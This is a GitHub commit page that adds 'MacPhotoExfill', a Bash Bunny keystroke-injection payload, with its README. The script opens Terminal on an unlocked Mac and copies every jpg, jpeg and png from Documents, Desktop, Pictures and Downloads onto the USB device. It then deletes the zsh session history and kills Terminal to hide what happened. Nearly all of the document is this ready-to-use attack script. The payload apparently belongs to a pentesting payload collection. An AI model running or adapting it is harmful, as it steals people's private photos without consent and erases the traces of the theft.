-
Notifications
You must be signed in to change notification settings - Fork 1.5k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #586 from afsh4ck/master
Exfilter all the images from the principal folders on unlocked MacOS …
- Loading branch information
Showing
2 changed files
with
119 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,69 @@ | ||
| #!/bin/bash | ||
| # | ||
| # Title: MacPhotoExfill | ||
| # Author: afsh4ck | ||
| # Version: 1.0 | ||
| # Target: MacOS | ||
| # Category: Exfiltration | ||
| # | ||
| # Exfilter all the images from the principal folders on unlocked MacOS targets. | ||
| # Stashes them in /loot/MacPhotoExfill | ||
| # | ||
| # Purple Setup | ||
| # Amber..............Attack Mode ON | ||
| # Green..............Finished | ||
|
|
||
| LED SETUP | ||
| ATTACKMODE HID STORAGE ECM_ETHERNET | ||
| GET TARGET_HOSTNAME | ||
| QUACK DELAY 1000 | ||
|
|
||
| lootdir=loot/MacPhotoExfill/$TARGET_HOSTNAME | ||
| mkdir -p /root/udisk/$lootdir | ||
|
|
||
| QUACK GUI SPACE | ||
| QUACK DELAY 1000 | ||
| QUACK STRING terminal | ||
| QUACK ENTER | ||
| QUACK DELAY 2000 | ||
|
|
||
| LED ATTACK | ||
|
|
||
| QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents; | ||
| QUACK ENTER | ||
| QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop; | ||
| QUACK ENTER | ||
| QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures; | ||
| QUACK ENTER | ||
| QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads; | ||
| QUACK ENTER | ||
| QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ; | ||
| QUACK ENTER | ||
| QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ; | ||
| QUACK ENTER | ||
| QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ; | ||
| QUACK ENTER | ||
| QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ; | ||
| QUACK ENTER | ||
| # We can control the time for the payload execution | ||
| QUACK DELAY 25000 | ||
| QUACK CTRL C | ||
| # Cleanup and delete proofs | ||
| LED M SLOW | ||
| QUACK ENTER | ||
| QUACK ENTER | ||
| # Eject BB storage | ||
| QUACK STRING diskutil eject /Volumes/BashBunny/ | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| # Remove terminal history from current session (commands used in attack won't be visible with the history command) | ||
| QUACK STRING rm -r ~/.zsh_sessions | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| # Exit terminal | ||
| QUACK STRING killall Terminal | ||
| QUACK ENTER | ||
| # Ensure sincronization | ||
| sync | ||
|
|
||
| LED FINISH |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,50 @@ | ||
| # Mac Photo Exfilter for the BashBunny | ||
|
|
||
|
|
||
| * ___ ___ ___ ___ ___ ___ ___ | ||
| * / /\ / /\ / /\ /__/\ / /\ / /\ /__/| | ||
| * / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:| | ||
| * / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:| | ||
| * / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:| | ||
| * /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____ | ||
| * \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/ | ||
| * \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/--- | ||
| * \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\ | ||
| * \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\ | ||
| * \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ | ||
|
|
||
|
|
||
| * Author: afsh4ck | ||
| * Version: 1.0 | ||
| * Target: MacOS | ||
| * Tested on: Ventura 13.3.1 | ||
| * Category: Exfiltration | ||
|
|
||
| # DESCRIPTION | ||
|
|
||
| Exfilter all the images from the principal folders on unlocked MacOS targets. | ||
| Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders: | ||
|
|
||
| | Subfolder | Content | | ||
| | ------------------ | -------------------------------------------- | | ||
| | Documents | All the images in /root/Documents folder | | ||
| | Desktop | All the images in /root/Desktop folder | | ||
| | Pictures | All the images in /root/Pictures folder | | ||
| | Downloads | All the images in /root/Downloads folder | | ||
|
|
||
| # IMAGE FORMATS | ||
|
|
||
| | Format | | ||
| | ------------------ | | ||
| | .jpg | | ||
| | .jpeg | | ||
| | .png | | ||
|
|
||
| # LED STATUS | ||
|
|
||
| | LED | Status | | ||
| | ------------------ | -------------------------------------------- | | ||
| | Green | Setup | | ||
| | Yellow Blink | Attack Mode ON | | ||
| | Purple Slow | Cleaning all proofs | | ||
| | Green Fixed | Finish | |